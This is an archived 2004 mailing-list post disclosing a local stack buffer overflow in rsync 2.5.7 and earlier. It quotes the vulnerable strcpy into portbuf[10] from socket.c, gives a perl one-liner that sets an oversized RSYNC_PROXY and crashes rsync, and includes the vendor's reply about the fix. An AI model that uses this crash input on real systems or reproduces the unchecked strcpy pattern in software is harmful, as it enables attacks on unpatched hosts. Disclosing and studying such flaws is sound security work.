Vulnerability Development mailing list archives
rsync <= 2.5.7 local buffer overflow (no root today:)
From: DownBload <downbload () hotmail com>
Date: 9 Feb 2004 21:13:02 -0000
Hi, There is a local buffer overflow in rsync <= 2.5.7. Problem is in open_socket_out function (socket.c). Attacker can overflow portbuf[10] buffer on stack and overwrite saved return address. Rsync isn't suid so, no root shell today :-). PoC example: [root@localhost rsync-2.5.7]# export RSYNC_PROXY=`perl -e 'print "A" x 100,":","A" x 1000'` [root@localhost rsync-2.5.7]# rsync localhost:: rsync: getaddrinfo: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAA: ai_family not supported Segmentation fault [root@localhost rsync-2.5.7]# - socket.c ... char portbuf[10]; char *h; int proxied = 0; char buffer[1024]; char *cp; h = getenv("RSYNC_PROXY"); proxied = (h != NULL) && (*h != '\0'); if (proxied) { strlcpy(buffer, h, sizeof(buffer)); cp = strchr(buffer, ':'); if (cp == NULL) { rprintf(FERROR, "invalid proxy specification: should be HOST:PORT\n"); return -1; } *cp++ = '\0'; strcpy(portbuf, cp); // <- OVERFLOW ... Vendor response: "Correct. I fixed this in the CVS version earlier this year. Since the proxy data is coming from the local environment, I don't see a need to roll out an update to 2.6.0 (which is the latest released version, BTW). The fix will be in 2.6.1, which should be released in the next month or two." DownBload / Illegal Instruction Labs http://www.ii-labs.org e-mail:downbload[at]hotmail.com "Born under the lucky star magical, but on this earth generally tragical."
Current thread:
- rsync <= 2.5.7 local buffer overflow (no root today:) DownBload (Feb 09)